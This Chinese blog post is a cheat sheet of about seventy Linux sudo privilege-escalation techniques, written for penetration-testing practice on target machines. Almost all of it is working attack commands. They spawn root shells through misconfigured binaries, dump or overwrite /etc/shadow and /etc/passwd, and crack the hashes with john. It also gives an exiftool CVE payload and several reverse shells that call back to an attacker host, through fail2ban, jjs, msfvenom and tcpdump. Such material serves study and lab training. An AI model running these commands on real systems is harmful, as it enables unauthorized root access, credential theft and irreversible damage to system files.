Linux下的全部sudo提权方法

最新推荐文章于 2025-07-08 22:01:35 发布
最新推荐文章于 2025-07-08 22:01:35 发布
阅读量1k 收藏 26
点赞数 14
CC 4.0 BY-SA版权
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_62554190/article/details/149122893

如果提权失败的话,自己去深入看一下提权的原理,万一是笔记写错了呢?!!

通篇文章的内容都有一个前置条件:sudo -l 有利用的提权信息,若此文章无成功提权,要再多试试别的方法

基础知识

sudo -l								查看用户权限
whoami								查看用户名
id										用户组
ip a									ip地址
su										提权到root
uname -a							显示操作系统的信息

提权总结:

      • 某些组件/命令/任务/anything 拥有 sudo 的直接运行权限
      • 或者这些命令可以引用自定义的第三方库/脚本
      • 语言有免密 root 的运行权限的话,都可以构造进行提权
      • 可以调用命令行的程序/工具的参数

小记

  1. hash破解:john shadow_hash --wordlist=/usr/share/wordlists/rockyou.txt
  2. 无需密码 root 执行: sudo -l:(root) NOPASSWD: /usr/bin/***
  3. 提升命令行交互性
    1. python3 -c "import pty;pty.spawn('/bin/bash')"
    2. 新建反弹 shell

提权命令

sudo version ≤ 1.8.28

sudo -V | grep version		#查看版本

sudo -u#-1 /bin/bash			#提权

sudo apt

sudo -l 列出枚举项包含 apt 项

sudo apt update -o APT::Update::Pre-Invoke::=/bin/bash

sudo apt-get 同样适用

sudo apache2

sudo -l 有 apache2

sudo apache2 -f /etc/shadow

拿到 hash 加密的 root 密码

sudo john hash_passwd --wordlist=/usr/share/wordlists/rockyou.txt

sudo ash

sudo -l

sudo ash

sudo awk

传递脚本的方式

sudo -l
sudo awk 'BEGIN {system("/bin/bash")}'

sudo base64

base32 base48 同理

sudo -l
cat /etc/shadow  //无权限
a=/etc
sudo base64 "$a" | base64 -d		#有看shadow的权限,原因是base64有直接的sudo运行权限

拿到shadow之后,使用john破解

sudo bash

sudo -l
sudo bash 		#直接实现提权
sudo csh/dash/sh/tclsh/zsh 			#这几种都是常见的bash环境可以实现提权

sudo cp

此操作有后果:会导致靶机中的 shadow 文件的内容都被覆盖掉且不可恢复

原理是将自己创建的 123456 覆盖掉之前的 shadow 文件

sudo -l		#当前用户不需要用户密码就可以直接使用cp命令
(root)NOPASSWD:/usr/bin/cp

将修改的 root 信息存好

在靶机中:

a=/etc/shadow
TF=$(mktemp)
echo '修改好的root信息' > $TF
echo $TF
/tmp/tmp.RmdhLEDVdO
cat /tmp/tmp.RmdhLeDVdO
//输出修改好的root信息

sudo /usr/bin/cp $TF $a			#会覆盖之前的shadow
su
123456
成功

sudo cpulimit

sudo -l
sudo cpulimit -l 100 -f /bin/bash
-l:限制cpu使用率
-f:指定一个程序受到-l参数的限制

sudo curl

sudo -l

将获取到的 root 信息存储到:shadow_entry 文件

sudo php -S 0:80			#在kali本地80端口开启一个php服务
sudo curl http://kali_ip/shadow_entry -o /etc/shadow		#靶机sudo权限curl后覆盖原始的shadow

sudo date

sudo -l
sudo date -f /etc/shadow
泄露了整个shadow文件的信息
jonh破解hash密码

sudo dd

sudo -l

echo '生成的root信息' | sudo dd of=/etc/shadow

sudo dstat

利用点:dstat 可以指定插件名来执行外部的插件

find / -name dstat -type d 2>/dev/null
    /usr/share/doc/dstat
    /usr/share/dstat
ls /usr/share/dstat
vim dstat_BinBash.py
  import os;os.execv("/bin/bash",["bash"])
cp dstat_BinBash.py /usr/share/dstat/dstat_BinBash.py
sudo dstat --BinBash
成功

sudo ed

sudo -l
sudo /usr/bin/ed		#进入ed编辑器
!/bin/bash					#提权

sudo env

sudo -l 
sudo env /bin/bash
成功

sudo exiftool

CVE-2021-22204 version:7.44-12.23

sudo -l
exiftool -ver					#查看是否为漏洞版本
vi payload
(metadata "\c${system('bin/bash')};") 		#写入payload
bzz payload payload.bzz									#使用bzz工具对payload进行压缩
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz 			#图片处理
sudo exiftool exploit.djvu

sudo expect

sudo -l
sudo expect -c "spawn /bin/bash;interact"
成功

sudo fail2ban

反复登录 ssh,超过 3 次(诸如此类限制)就会把访问 ip 办掉

sudo -l
find / -name "fail2ban*" -type d 2>/dev/null
  /usr/share/doc/fail2ban
  /usr/lib/python3/dist-packages/fail2ban-0.11.2.egg-info
  /usr/lib/python3/dist-packages/fail2ban
  /run/fail2ban
  /var/lib/fail2ban
  /etc/fail2ban
  /etc/fail2ban/fail2ban.d

find /etc -writable -type d 2>/dev/null
  /etc/fail2ban/action.d

cd /etc/fail2ban/
ls
vim jail.conf

cd /etc/fail2ban/action.d			#脚本目录

actionban = rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc Kali_IP 9595 > /tmp/f
sudo /etc/init.d/fail2ban restart			//重启fail2ban服务
sudo nc -lvnp 9595				#启动监听
sudo shh Baji_Username@Baji_IP		#ssh连接靶机
多次输入错误密码,超过maxrety后执行actionban脚本提权。

sudo find

sudo -l
sudo find . -exec /bin/bash \; -quit

sudo flock

sudo -l
sudo flock -u / /bin/bash

sudo ftp

sudo -l
sudo ftp
  !/bin/bash
成功

sudo gcc

sudo -l
sudo gcc -wrapper /bin/bash,-s .
成功

sudo gdb

sudo -l
sudo gdb -nx -ex '!bash' -ex quit
成功

sudo git

sudo -l
sudo git branch --help
在这个界面不要洞,摁esc然后冒号,输入!/bin/bash
成功

sudo gzip/gunzip

gzip/gunzip 用法相同

sudo -l
sudo gzip -f /etc/shadow -t 	#-f:强制执行
拿到shadow内容,使用john破解
su			#登录root

sudo hping3

hping3:用于分析和测试网络环境,生成各种网络包

sudo -l
sudo hping3
  /bin/bash

sudo iftop

sudo -l
sudo iftop
  !/bin/bash

sudo java

sudo -l
#遇到大的语言程序,想到的就是使用语言本身来进行提权
sudo msfvenom -p java/shell_reverse_tcp LHOST=Kali_IP LPORT=4444 -f jar -o shell.jar		#生成监听文件

sudo php -S 0:80			#建立简单的web服务
sudo nc -lvnp 4444		#启动监听
cd /tmp
wget http://Kali_IP/shell.jar				#下载
chmod +x shell.jar
sudo java -jar shell.jar
成功

sudo jjs

javascript shell

sudo -l	
sudo nc -lvnp 9595
echo "Java.type('java.lang.Runtime').getRuntime().exec(['/bin/bash','-c','exec 5<>/dev/tcp/Kali_IP/9595;cat <&5 | while read line; do \$line 2>&5 >&5; done']).waitFor()" | sudo jjs
成功

sudo journalctl

sudo -l
sudo journalctl
  !/bin/bash
成功

sudo knife

sudo -l
sudo knife exec -E 'exec "/bin/bash"'
成功

sudo less

很多的文本利用机制都是使用的 less 机制,提权机制也是相同的

sudo -l
mktemp ./XXXXX			#生成一个临时文件
sudo less (生成的文件)
  !/bin/bash
成功

sudo man

sudo -l
sudo man ls
  !/bin/bash
成功

sudo more

sudo -l
#找一个文件使得more一页放不下
sudo more File_Name
  !/bin/bash
成功

sudo mount

mount 用于挂在系统的(磁盘、目录等)

sudo -l
sudo mount -o bind /bin/bash /usr/bin/mount
sudo mount  			#执行bash命令
成功

sudo mysql

sudo -l
sudo mysql -e '\! /bin/bash'
成功

sudo nano

文本编辑器

sudo -l
sudo nano
  Ctrl+R
  Ctrl+X
  reset;bash 1>&0 2>&0
  摁回车
成功

sudo neofetch

sudo -l 
a=$(mktemp)
echo 'exec /bin/bash' > $a
sudo neofetch --config $a

sudo nice

sudo -l
sudo nice /bin/bash 		#nice可以指定一个程序以10权限运行
成功

sudo nmap

nmap 的不同版本有不同的提权方式

nmap 可以指定执行脚本文件

sudo -l
a=$(mktemp)
echo 'os.execute("/bin/bash")' > $a
sudo nmap --script=$a
成功

sudo node

node.js

sudo -l
sudo node -e "require('child_process').spawn('/bin/bash',{stdio:[0,1,2]})"
成功

sudo nohup

sudo -l
sudo nohup /bin/bash -c "bash <$(tty) >$(tty) 2>$(tty)"
成功

sudo openvpn

sudo -l
#指定参数读取
sudo openvpn --config /etc/shadow
会输出shadow的第一行:root的shadow的记录
john破解

sudo passwd

sudo -l
sudo passwd root
成功

sudo perl

perl 也是一种语言

sudo -l
sudo perl -e 'exec "/bin/bash";'
成功

sudo php

php 命令行可以直接执行系统命令

sudo -l
sudo php -r "system('/bin/bash');"

php 还有很多其他的构造形式,使用过程中自行探索

sudo pico

文本编辑器

sudo -l
sudo pico
  Ctrl+R
  Ctrl+X
  reset;bash 1>&0 2>&0
  摁回车
成功

sudo pkexec

sudo -l
sudo pkexec /bin/bash
成功

sudo python3

sudo -l
sudo python3 -c "import os;os.system('/bin/bash')"

提权命令有很多,有很多方法

sudo rvim

sudo -l
sudo rvim -c ':python import os; os.execl("/bin/bash","bash","-c","reset;exec bash")'
成功

sudo scp

secure copu:利用 ssh 进行远程的安全的文件复制的工具

sudo -l
a=$(mktemp)
echo 'bash 0<&2 1<&2' > $a
chmod +x "$a"
sudo scp -S $a x y:
成功

sudo screen

终端复用工具

sudo -l
sudo screen
摁回车
成功

sudo script

sudo -l
sudo script			#此命令即可进入root权限,但是会有记录
sudo script -q /dev/null		#可以进入root但是不会记录

sudo sed

强大的文本处理工具

sudo -l
sudo sed -n '1e exec bash 1>&0' /etc/hosts
成功

sudo service

sudo -l
sudo service ../../bin/bash			#service在搜索可执行文件的时候是在path中进行搜索,因此需要../回退目录
成功

sudo socat

sudo -l
sudo socat stdin exec:/bin/bash

sudo ssh

sudo -l
sudo ssh -o ProxyCommand=';bash 0<&2 1>&2' x

sudo ssh-keygen

sudo -l
vim a.c		#编辑一个c文件			
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
static void inject()__attribute__((constructor));

void inject(){
    setuid(0);
    system("/bin/bash -P");
}


gcc -shared -fPIC -o a.so a.c			#生成a.so文件,需查看是否有执行权限
sudo ssh-keygen -D ./a.so					#提权命令,如果没成功的话自己去调研一下
成功

sudo strace

追踪和记录另一个进程的系统调用和接受到的信号,对于调试和理解程序的运行方式有用

sudo -l
sudo strace -o /dev/null /bin/bash
成功

sudo systemctl

sudo -l
sudo systemctl
  !/bin/bash
成功

sudo tcpdump

监听/捕获网络流量的工具

sudo -l
#将网络流量包捕获并传递给一个脚本进行处理
vim a.sh
mknod a_pipe p && /bin/nc Kali_IP 9595 0<a_pipe | /bin/bash 1>a_pipe
ls -liah a.sh		#查看是否有编辑权限
ip a						#查看靶机的网卡
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /a.sh -Z root		#提权命令
sudo nc -lvnp 9595					#靶机运行提权命令后即可反连进入shell
成功

sudo tee

此次利用使用的是 passwd 文件,实际场景中研究一下是否也可以使用 shadow 文件呢?

sudo -l
openssl passwd -1 -salt UserTest '123456'		#生成有盐值的hash值
cat /etc/passwd | grep root									#获取linux中的passwd的组成形式
修改passwd

echo 'UserTest:$1$UserTest$zRq5YT8zuNyGcNb/88Uov.:0:0:root:/root:/usr/bin/bash' | sudo  tee -a /etc/passwd
su UserTest
  123456
成功

sudo timedatectl

类似 less 利用

sudo -l
sudo timedatectl list-timezones
  !/bin/bash
成功

sudo tmux

端口复用工具

sudo -l
sudo tmux
成功

sudo vi

sudo -l
sudo vi 
  :!/bin/bash
成功
sudo vi -c ':!/bin/bash' /dev/null			#与上边方法同理

sudo wall

广播消息的命令。

有 sudo 权限就可以读取任何文本文件

sudo -l
sudo wall --no /etc/shadow
john破解shadow

sudo watch

周期性(每 2s)执行命令并显示结果的程序,-x 参数可以在命令行输出执行的参数

sudo -l
sudo watch -x bash -c 'reset; exec bash 1>&0 2>&0'
成功

sudo wget

sudo -l
a=$(mktemp)
chmod +x $a
echo -e '#!/bin/bash\n/bin/bash 1>&0' > $a
sudo wget --use-askpass=$a 0						#构造use-askpass参数
成功

-o 参数可以将下载的内容重写到某一个位置(也可以利用)

sudo zip

-T #检测压缩文件的完整性

-TT #指定一个程序去检测压缩包的完整性,可以指定加入提权逻辑的程序

sudo -l
sudo zip foo /etc/hostname -T -TT 'bash #'
成功

sudo xxd

可以将一个二进制文件转换成 十六进制,也可逆

sudo -l
sudo xxd /etc/shadow | xxd -r 		#明文shadow文件
john破解

OVER!

我是参考红队笔记的视频写的这篇帖子,隆重感谢!「红队笔记」Linux提权精讲:Sudo风暴 - Sudo风暴全70讲,扫地僧级别心法,研究提权技术的同时,打磨你对linux内核的深度理解。渗透测试宝典。_哔哩哔哩_bilibili

Dr.Jimi
关注
sudo
shatianyzg的博客
06-24 882
Sudo 命令 udo /usr/bin/awk ‘BEGIN {system(“/bin/bash”)}’获取shell /usr/bin/curl 获取shellfind . -exec /bin/sh ; -quit 可以发现,哪怕是find这种查找命令被赋予了sudo,也能够瞬间为root限,只要我们能够巧妙的利用执行这些命令...
Linuxsudo限(入门)
m0_73726899的博客
08-08 2537
sudo命令以系统管理者的身份执行指令,也就是说,经由 sudo 所执行的指令就好像是 root 亲自执行。
Linux sudo 命令
孤独,平庸,落魄
07-06 2788
Linux sudo 命令 当我们需要用root用户来进行一些操作的时候,每次又不想切换到root用户下,可以给普通用户达来达目的。 1,修改配置文件 vim /etc/sudoers,在root这行下添加 user ALL=(ALL) ALL。 2,设置完成后,就可以sudo 命令 进行操作了。 3,如果你想每次的时候都输入普通用户的密码,就把wheel前边的# 注释去掉。 4,如果你想的时候不输入密码,就找到 %wheel ALL=
Linux&sudo
weixin_44705204的博客
06-01 1339
本文介绍了23种常见的sudo方式,主要还是利用了系统对可执行文件/工具的高限配置,使得低限的用户(初始靶机shell)能够以rootsudo免密执行高限的指令。less是常见的用于读取文件的工具,前面已经到了许多类似less机制的,都是利用了读取文件时可以键入系统命令启动shell,利用详见less | GTFOBins。文末的总结与思考模块会对本篇涉及到的方法进行分类,并总结sudo的思路与逻辑,未必描述的完全恰当,仅是我的个人理解,也欢迎读者评论与私信共同探讨。
linux sudo
weixin_30371875的博客
11-09 231
对于可以sudo的用户,就可以获得root限,具体方法如下: 1.sudo vi sudo vi filename 在vi的命令行输入:!sh 进入shell 使用id查看,发现是root限 2.sudo more sudo more filename 输入!sh 进入shell 使用id查看 3.sudo less sud...
Linux--SUDO
qq_37107430的博客
02-05 1402
sudoLinux 中常用的特管理工具,允许普通用户以其他用户(通常是 root 用户)的身份运行命令。如果配置不当,攻击者可能通过滥用 sudo 限来升自己的限。
Linuxsudo
qq_41123867的博客
03-27 2734
一、原理 sudolinux中临时使用其他用户命令(一般是root)的一种机制,使用sudo+命令时,将以root用户的身份执行命令。如果在执行命令的过程中,可以输入打开shell的脚本,系统将打开一个用户为root的shell,从而实现。 二、可以用来的命令 vi more less git 三、过程 环境:DC-2靶机,基于Debian7.11,已经拥有一个可以用ssh连接的低...
Linux曝出Sudo漏洞 任意用户亦可运行root命令
09-14
最近,一个名为"Sudo漏洞"的问题被曝光,这使得任何用户,即使在配置中明确禁止root用户访问,也能在Linux系统上以root限执行任意命令。 Sudo的工作原理是基于一个名为/etc/sudoers的配置文件,这个文件定义...
Linux-02 sudo
weixin_45626840的博客
01-19 983
执行限继承:当用户执行sudo后面跟随的命令时,这个命令会继承sudo限。在这种情况下,虽然用户是普通用户,但由于sudo在以root用户的身份执行,随后的命令则也可以在root限下运行。设置setuid限:sudo程序本身被设置了setuid属性,这意味着当任何用户执行这个程序时,它会以程序拥有者(通常是root)的限运行。限配置不当,如果这些可执行文件本身又可以调用其他可执行文件,或者可以更改系统的一些配置选项,就可以达到的目的。
LinuxSudo 70种方法(上)
简单安全
04-04 2155
就是说flock能够解锁当前目录下的文件,允许它被操作其他的文件操作,这里是被bash操作,就会新起一个会话,因为这里是以sudo前缀执行,肯定就是root限。利用cp命令,把TF变量里的内容里写入shadow文件,但要知道,这个操作是有损的,最后靶机shadow文件中只有这一行,如果不进行备份,在实际攻防中优先级是排后的。插件的使用方法是,这些python文件,去掉前面的前缀,后面就是插件名称,按照这个方式,在里面构建一个python文件,里面写入python语法。
LinuxSudo 70种方法(下)
简单安全
04-06 2719
pico和nano很相似,所以方式也很相似,但它两却是不同的编辑器,从功能上和使用场景上有那么一点差别Ctrl+r 读取文件Ctrl+x 执行命令reset 将环境重置,确保是一个干净的环节;并列执行的命令1>&0 2>&0 对输入输出做一个规划,错误输出也要重定向获得一个后的shell环境。
Linuxsudo(简单明了一看就会!!!)
Aprilqxs的博客
06-03 1605
abc组 可以以tom用户的身份在server1主机上无密码执行 rm -rf , remove , del 命令。#abc 用户可以以任何用户身份在任何主机上无需密码的执行mkdir和useradd命令。#ABC用户可已在以任何用户身份在任何主机上 无需密码的执行任何命令。如果有用户需要做,就在这行下照格式写一行配置就OK了~用户 用户=(主机名) 命令列表。字段4(也就是最后的ALL): 执行的命令。字段2(ALL=):以哪个用户的身份。希望这些知识点对大家有帮助~~~~
Linuxsudo
佛系摆烂
11-16 1419
执行后会获得shadow存储的数据,将root的数据存放在shadow_root,然后使用john进行破解。报错信息会将shadow的第一行显示出来,将其保存在shadow_root文件中,然后用john进行破解。将root的一行的hash值复制下来保存到shadow_root.txt,利用john来破解密码。将root对应的hash替换为生成的hash,并保存到shadow_entry.txt文件。用生成的hash替换原有的root的密码并将其保存在shadow_root.txt。
SUDO
最新发布
starry_ke
07-08 381
本文介绍了三种利用sudo限设置漏洞进行方法
linux SUDO
weixin_68652890的博客
04-15 3340
suid 知识点: sudo命令: 以系统管理者的身份执行指令 sudoer文件: 要想使一个用户具有使用sudo的能力,需要让root用户将其名字、可以执行的特定命令、按照哪种用户或用户组的身份执行等信息注册到/etc/sudoers文件中,即完成对该用户的授(此时该用户称为“sudoer”)才可以。 查看sudoers文件: root all=(all:all)all //root用户可在任何终端执行任意命令 wangw all=/usr/bin/find//wangw用户可在任何终端使用自己
Linuxsudo给某条指令
fufufu_的博客
01-06 1025
sudo给指令和把普通用户加入到root的信任列表
linux中的sudo如何设置
04-11
sudo是一个非常强大的命令,可以让用户在非管理员限下执行需要管理员限才能运行的命令。在Linux中,我们可以通过编辑sudo配置文件来设置sudo规则。你可以使用visudo命令打开sudo配置文件,然后添加或修改相应的条目来控制用户的方式和范围。更多关于sudo的详细配置和用法可以在Linux文档或在线论坛上找到。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值